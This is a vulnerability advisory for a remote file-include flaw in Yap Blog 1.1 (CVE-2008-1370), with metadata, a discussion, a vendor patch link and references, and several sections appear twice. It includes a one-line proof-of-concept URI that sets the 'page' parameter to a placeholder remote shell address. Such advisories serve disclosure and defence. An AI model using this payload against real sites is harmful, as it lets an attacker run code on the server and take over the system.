Yap Blog 'index.php' Remote File Include Vulnerability
BID:28120
Info
Yap Blog 'index.php' Remote File Include Vulnerability
| Bugtraq ID: | 28120 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1370 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 06 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | THE_MILLER |
| Vulnerable: |
wildmary Yap Blog 1.1 |
| Not Vulnerable: |
wildmary Yap Blog 1.1.1 |
Discussion
Yap Blog 'index.php' Remote File Include Vulnerability
Yap Blog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions prior to Yap Blog 1.1.1 are vulnerable.
Yap Blog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions prior to Yap Blog 1.1.1 are vulnerable.
Exploit / POC
Yap Blog 'index.php' Remote File Include Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/[path]/index.php?page=[Sh3llAddress]
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/[path]/index.php?page=[Sh3llAddress]
Solution / Fix
Yap Blog 'index.php' Remote File Include Vulnerability
Solution:
The vendor has released updates. Please contact the vendor for details.
wildmary Yap Blog 1.1
Solution:
The vendor has released updates. Please contact the vendor for details.
wildmary Yap Blog 1.1
-
wildmary yap-patch1.1.1.zip
http://wildmary.net-sauvage.com/share/yap-patch1.1.1.zip
References
Yap Blog 'index.php' Remote File Include Vulnerability
References:
References:
- YAP - patch de sécurité (wildmary)
- Yap Blog Homepage (wildmary)